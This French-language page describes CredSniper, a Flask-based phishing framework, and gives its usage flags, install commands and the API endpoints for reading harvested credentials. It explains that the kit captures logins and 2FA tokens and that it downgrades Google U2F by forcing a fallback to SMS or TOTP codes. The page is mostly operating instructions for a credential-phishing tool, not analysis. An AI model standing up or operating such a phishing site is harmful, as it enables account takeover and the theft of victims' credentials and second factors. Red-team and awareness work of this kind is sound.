
CredSniper est un framework de phishing écrit avec le micro-framework Python Flask et le templating Jinja2, qui permet de capturer les jetons 2FA.
Lancez facilement un nouveau site de phishing entièrement présenté avec SSL et capturez les identifiants ainsi que les jetons 2FA à l'aide de CredSniper. L'API fournit un accès sécurisé aux identifiants actuellement capturés qui peuvent être consommés par d'autres applications à l'aide d'un jeton API généré aléatoirement.
Proposé par :

usage: credsniper.py [-h] --module MODULE [--twofactor] [--port PORT] [--ssl] [--verbose] --final FINAL --hostname HOSTNAME
optional arguments:
-h, --help show this help message and exit
--module MODULE phishing module name - for example, "gmail"
--twofactor enable two-factor phishing
--port PORT listening port (default: 80/443)
--ssl use SSL via Let's Encrypt
--verbose enable verbose output
--final FINAL final url the user is redirected to after phishing is done
--hostname HOSTNAME hostname for SSL
.cache : Stocke temporairement le nom d'utilisateur/mot de passe lors du phishing 2FA
.sniped : Stockage en fichier plat pour les identifiants capturés et autres informations
Voir les identifiants (GET)
https://<phish site>/creds/view?api_token=<api token>
Marquer un identifiant comme vu (GET)
https://<phish site>/creds/seen/<cred_id>?api_token=<api token>
Mettre à jour la configuration (POST)
https://<phish site>/config
{
'enable_2fa': true,
'module': 'gmail',
'api_token': 'some-random-string'
}
Tous les modules peuvent être chargés en passant la commande --module <name> à CredSniper. Ceux-ci sont chargés depuis un répertoire à l'intérieur de /modules. CredSniper est construit avec Python Flask et tous les templates HTML des modules sont rendus avec Jinja2.
MISE À JOUR GMAIL : Google exige une forme de secours de 2FA lors de l'utilisation de U2F. Contourner U2F est possible en forçant l'une des options de repli au lieu d'inviter l'utilisateur à utiliser son appareil U2F. CredSniper tente de forcer SMS si disponible, sinon il force TOTP. Pour des victimes averties en sécurité, elles peuvent se méfier si on leur demande le jeton SMS ou TOTP au lieu de leur appareil U2F.
Vous pouvez installer et exécuter automatiquement avec la commande suivante :
$ git clone https://github.com/ustayready/CredSniper
$ cd CredSniper
~/CredSniper$ ./install.sh
Ensuite, pour exécuter manuellement, utilisez les commandes suivantes :
~/$ cd CredSniper
~/CredSniper$ source bin/activate
(CredSniper) ~/CredSniper$ python credsniper.py --help
Notez que Python 3 est requis.





git checkout -b my-new-feature)git commit -am 'Add some feature')git push origin my-new-feature)Les rapports de bogues, les demandes de fonctionnalités et les correctifs sont les bienvenus.